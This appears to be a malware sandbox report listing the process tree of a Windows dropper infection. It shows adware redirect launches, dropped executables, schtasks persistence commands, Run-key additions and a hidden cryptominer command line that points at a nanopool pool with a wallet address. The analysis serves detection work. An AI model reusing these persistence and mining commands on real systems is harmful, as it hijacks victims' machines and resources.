C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514837⤵PID:3192
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe4,0xe8,0x108,0xdc,0x10c,0x7ffdf6ff46f8,0x7ffdf6ff4708,0x7ffdf6ff47188⤵PID:1160
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515137⤵PID:1392
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdf6ff46f8,0x7ffdf6ff4708,0x7ffdf6ff47188⤵PID:2172
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872157⤵PID:72
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdf6ff46f8,0x7ffdf6ff4708,0x7ffdf6ff47188⤵PID:3452
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631197⤵PID:5972
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdf6ff46f8,0x7ffdf6ff4708,0x7ffdf6ff47188⤵PID:2384
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942317⤵PID:2848
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdf6ff46f8,0x7ffdf6ff4708,0x7ffdf6ff47188⤵PID:6616
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d6-db5fe-475-7f199-6af392b37c44c\Rivorojihe.exe"C:\Users\Admin\AppData\Local\Temp\d6-db5fe-475-7f199-6af392b37c44c\Rivorojihe.exe"6⤵PID:4268
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwxxwqrp.4w4\GcleanerEU.exe /eufive & exit7⤵
- Suspicious use of SetWindowsHookEx
PID:3884 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sk55si5j.lm0\installer.exe /qn CAMPAIGN="654" & exit7⤵PID:1704
-
C:\Users\Admin\AppData\Local\Temp\sk55si5j.lm0\installer.exeC:\Users\Admin\AppData\Local\Temp\sk55si5j.lm0\installer.exe /qn CAMPAIGN="654"8⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:2004 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\sk55si5j.lm0\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\sk55si5j.lm0\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628932158 /qn CAMPAIGN=""654"" " CAMPAIGN="654"9⤵PID:6492
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zbmjfapt.opc\ufgaa.exe & exit7⤵PID:5436
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
PID:1536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ye2wi2nn.mhj\anyname.exe & exit7⤵PID:6656
-
C:\Users\Admin\AppData\Local\Temp\ye2wi2nn.mhj\anyname.exeC:\Users\Admin\AppData\Local\Temp\ye2wi2nn.mhj\anyname.exe8⤵PID:6184
-
C:\Users\Admin\AppData\Local\Temp\ye2wi2nn.mhj\anyname.exe"C:\Users\Admin\AppData\Local\Temp\ye2wi2nn.mhj\anyname.exe" -q9⤵PID:6708
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ssjutxx0.cdi\gcleaner.exe /mixfive & exit7⤵
- Suspicious use of SetWindowsHookEx
PID:7108
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1072 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1072 -s 17724⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5644
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:3708 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628932158 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"4⤵PID:5776
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"3⤵
- Executes dropped EXE
PID:1040 -
C:\Users\Admin\AppData\Roaming\3924183.exe"C:\Users\Admin\AppData\Roaming\3924183.exe"4⤵
- Executes dropped EXE
PID:5368 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5368 -s 23005⤵
- Program crash
PID:4712
-
-
-
C:\Users\Admin\AppData\Roaming\1473080.exe"C:\Users\Admin\AppData\Roaming\1473080.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5552 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"5⤵PID:4576
-
-
-
C:\Users\Admin\AppData\Roaming\4317104.exe"C:\Users\Admin\AppData\Roaming\4317104.exe"4⤵
- Executes dropped EXE
PID:5640
-
-
C:\Users\Admin\AppData\Roaming\6297292.exe"C:\Users\Admin\AppData\Roaming\6297292.exe"4⤵
- Executes dropped EXE
PID:5744 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 20845⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5084
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:4684
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"3⤵
- Executes dropped EXE
PID:1516 -
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe" -a4⤵
- Executes dropped EXE
PID:5732
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"3⤵
- Executes dropped EXE
PID:5320 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit4⤵PID:5184
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'5⤵
- Creates scheduled task(s)
PID:6088
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵PID:3872
-
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"4⤵
- Suspicious use of SetThreadContext
PID:3176 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit5⤵PID:852
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'6⤵
- Creates scheduled task(s)
PID:2232
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵PID:6228
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --nicehash --tls --cinit-stealth5⤵PID:6884
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 656 -ip 6561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4456 -ip 44561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5000
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2812 -ip 28121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2740
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1192 -ip 11921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1608 -ip 16081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:2540
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:4960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 840 -ip 8401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 1016 -ip 10161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3628
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:448 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:4276 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1176
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4276 -ip 42761⤵PID:4684
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4716 -ip 47161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5860
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:5476 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
PID:4244 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5940
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4244 -ip 42441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6048
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1072 -ip 10721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:6132
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:6060 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DAACCB6D3EF0EBC64C377E07E5874EAF C2⤵
- Loads dropped DLL
PID:5004
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7F4266BEBFD6A78D7859BD4270EA87752⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:6012
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0564138F09373E09A94EC1F1D5D4C86A C2⤵
- Loads dropped DLL
PID:6348
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
PID:2924 -
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
- Loads dropped DLL
- Adds Run key to start application
PID:1840 -
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:3268 -
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffe00cbdec0,0x7ffe00cbded0,0x7ffe00cbdee05⤵
- Loads dropped DLL
PID:5968
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --mojo-platform-channel-handle=2100 /prefetch:85⤵
- Loads dropped DLL
PID:5132
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --mojo-platform-channel-handle=1660 /prefetch:85⤵
- Loads dropped DLL
PID:1624
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1488 /prefetch:25⤵
- Loads dropped DLL
PID:5992
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2672 /prefetch:15⤵PID:5680
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2664 /prefetch:15⤵
- Loads dropped DLL
PID:3016
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --mojo-platform-channel-handle=2836 /prefetch:85⤵PID:5980
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2992 /prefetch:25⤵PID:2624
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --mojo-platform-channel-handle=2820 /prefetch:85⤵PID:1512
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --mojo-platform-channel-handle=2764 /prefetch:85⤵PID:3212
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --mojo-platform-channel-handle=2184 /prefetch:85⤵PID:2528
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --mojo-platform-channel-handle=2772 /prefetch:85⤵PID:5328
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_ECF2.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵
- Blocklisted process makes network request
PID:6248
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:6032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5744 -ip 57441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1016
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 5368 -ip 53681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5624
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:51⤵PID:5604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 3932 -ip 39321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 6028 -ip 60281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6676
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:6708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 6740 -ip 67401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6664
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 6740 -ip 67401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6824
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6148 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:6748 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5988
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6748 -ip 67481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:6584
